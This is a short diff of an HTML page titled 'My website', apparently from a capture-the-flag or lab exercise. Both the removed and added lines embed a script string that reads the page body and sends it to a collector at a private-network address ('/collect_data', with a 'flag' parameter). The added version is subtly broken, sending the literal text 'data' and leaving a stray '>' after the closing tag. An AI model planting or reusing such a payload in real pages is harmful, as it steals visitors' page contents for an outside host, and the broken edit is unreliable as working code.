--- a/index.html
+++ b/index.html
@@ -4,11 +4,11 @@
    	<title>My website</title>
    	<script >
 
-   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST\", \"http://192.168.2.83:3000/collect_data\",true); xhr.send(\"flag=\"+data); <//script>";
+   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST\", \"http://192.168.2.82/collect_data?flag=data\",true); xhr.send() <//script>";
    		document.title=script_title;
 
 
-   	</script>
+   	</script>>
   </head>
 
   <body>
